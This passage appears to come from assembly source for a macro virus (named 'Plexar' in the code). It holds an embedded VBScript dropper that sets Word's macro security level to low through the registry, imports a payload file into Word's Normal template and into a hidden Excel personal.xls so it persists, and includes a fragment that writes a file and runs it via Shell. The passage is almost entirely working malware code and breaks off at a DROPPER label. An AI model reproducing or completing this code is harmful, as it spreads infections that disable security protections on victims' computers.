DB 'Put #1, 1, X$', 0Dh, 0Ah
|
|||
|
DB 'Close #1', 0Dh, 0Ah
|
|||
|
DB 'xoxo = Shell(raxname, 0)', 0Dh, 0Ah
|
|||
|
DB 'End Sub', 0Dh, 0Ah
|
|||
|
L_Virus_Macro_2 EQU $-Virus_Macro_2
|
|||
|
|
|||
|
Nihil DB 00h
|
|||
|
Memoria DD 00000000h
|
|||
|
Raxelp_$$$ DB "c:\raxelp.$$$", 00h
|
|||
|
Plxwrd_vbs DB "plxwrd.vbs", 00h
|
|||
|
|
|||
|
Macro_VBS LABEL NEAR
|
|||
|
DB 'On Error Resume Next', 0Dh, 0Ah
|
|||
|
DB 'Set word = CreateObject("Word.Application")', 0Dh, 0Ah
|
|||
|
DB 'If ( word <> "" ) Then', 0Dh, 0Ah
|
|||
|
DB 'word.System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = "1"', 0Dh, 0Ah
|
|||
|
DB 'word.System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Word\Security", "Level") = "1"', 0Dh, 0Ah
|
|||
|
DB 'Set maca = word.Application.NormalTemplate.VBProject.VBComponents', 0Dh, 0Ah
|
|||
|
DB 'If maca.Item("Plexar").Name <> "Plexar" Then', 0Dh, 0Ah
|
|||
|
DB 'maca.Import "c:\raxelp.$$$"', 0Dh, 0Ah
|
|||
|
DB 'word.Application.NormalTemplate.Save', 0Dh, 0Ah
|
|||
|
DB 'End If', 0Dh, 0Ah
|
|||
|
DB 'End If', 0Dh, 0Ah
|
|||
|
DB 'Set fso = CreateObject("Scripting.FileSystemObject")', 0Dh, 0Ah
|
|||
|
DB 'Set excel = CreateObject("Excel.Application")', 0Dh, 0Ah
|
|||
|
DB 'If ( excel <> "" ) Then', 0Dh, 0Ah
|
|||
|
DB 'yyy = excel.Application.StartupPath & "\personal.xls"', 0Dh, 0Ah
|
|||
|
DB 'If (fso.FileExists(yyy) = False) Then', 0Dh, 0Ah
|
|||
|
DB 'excel.WorkBooks.Add.SaveAs yyy', 0Dh, 0Ah
|
|||
|
DB 'excel.Application.ActiveWorkbook.VBProject.VBComponents.Import "c:\raxelp.$$$"', 0Dh, 0Ah
|
|||
|
DB 'excel.ActiveWindow.Visible = Not -1', 0Dh, 0Ah
|
|||
|
DB 'excel.Workbooks("personal.xls").Save', 0Dh, 0Ah
|
|||
|
DB 'End If', 0Dh, 0Ah
|
|||
|
DB 'excel.Application.Quit', 0Dh, 0Ah
|
|||
|
DB 'End If', 0Dh, 0Ah
|
|||
|
Largo_MVBS EQU $-Macro_VBS
|
|||
|
|
|||
|
FHandle_DPE DD 00000000h
|
|||
|
MHandle_DPE DD 00000000h
|
|||
|
BaseMap_DPE DD 00000000h
|
|||
|
|
|||
|
DROPPER LABEL NEAR
|
|||
|
|
|||
|
DB |